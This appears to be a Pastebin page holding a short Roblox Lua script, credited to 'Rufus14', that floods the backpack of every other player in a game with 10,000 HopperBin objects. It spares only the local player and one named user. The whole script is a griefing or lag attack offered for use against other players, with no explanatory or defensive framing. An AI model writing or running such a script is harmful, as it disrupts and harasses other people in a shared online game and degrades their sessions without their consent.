Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --By Rufus14
- for i,v in pairs(game.Players:GetChildren()) do
- if v.Name == game.Players.LocalPlayer.Character.Name or v.Name == "kaemi" then
- --do nothing
- else
- for i = 1,10000 do
- Instance.new("HopperBin", v.Backpack)
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement